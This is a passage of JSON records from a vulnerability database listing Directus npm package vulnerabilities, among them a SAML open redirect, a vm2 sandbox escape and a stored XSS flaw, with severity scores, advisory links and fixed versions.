pss?cve=CVE-2026-35413"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413"},{"reference_url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerabili
ty":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35413","GHSA-wxwm-3fxv-mrvx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gwwu-p9jt-eke3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21999?format=json","vulnerability_id":"VCID-hed8-anm5-ukc9","summary":"Directus has open redirect in SAML\nAn open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032","reference_id":"","reference_type":"","scores":[{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.25007","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032","reference_id":"CVE-2026-22032","
reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032"},{"reference_url":"https://github.com/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3573-4c68-g8cc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72002?format=json","purl":"pkg:npm/directus@11.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0"}],"aliases":["CVE-2026-22032","GHSA-3573-4c68-g8cc"],"risk_score":null,"exploita
bility":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hed8-anm5-ukc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18457?format=json","vulnerability_id":"VCID-hrqc-8err-4fbx","summary":"Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058"},{"reference_url":"https://github.com/directus/directus/pull/19332","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/pull/19332"},{"reference_url":"https://github.com/advisories/GHSA-22rr
-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65807?format=json","purl":"pkg:npm/directus@10.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},
{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-n7m6-zecb-6qh2"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0"}],"aliases":["GHSA-22rr-f3p8-5gf8","GMS-2023-2358"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hrqc-8err-4fbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20785?format=json","vulnerability_id":"VCID-jjth-fmsp-rfcj","summary":"Directus is Vulnerable to Stored Cross-site Scripting\nA stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. 
Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11177","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747","reference_id":"CVE-2025-64747","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747"},{"reference_url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv2v-pw
69-8crf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64747","GHSA-vv2v-pw69-8crf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jjth-fmsp-rfcj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/274523?format=json","vulnerability_id":"VCID-kqs7-8txh-jyc8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18294","published_at":"2026-05-30T12
:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534"},{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://directus.io/","reference_id":"directus.io","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}
],"url":"https://directus.io/"},{"reference_url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82575?format=json","purl":"pkg:npm/directus@10.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulner
ability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2"}],"aliases":["CVE-2024-6534","GHSA-3fff-gqw3-vj86"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kqs7-8txh-jyc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/288018?format=json","vulnerability_id":"VCID-m3wb-sstx-v3d6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57503","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c696
5ac804"},{"reference_url":"https://github.com/directus/directus/pull/23716","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/pull/23716"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.2.0","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.2.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system"
:"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353"},{"reference_url":"https://www.youtube.com/watch?v=DbV4IxbWzN4","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://www.youtube.com/watch?v=DbV4IxbWzN4"},{"reference_url":"https://github.com/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pmf4-v838-29hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/193822?format=json","purl":"pkg:npm/directus@11.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b
5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0"}],"aliases":["CVE-2025-24353","GHSA-pmf4-v838-29hg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m3wb-sstx-v3d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330168?format=json","vulnerability_id":"VCID-mp82-hx9n-dufy","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00946","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI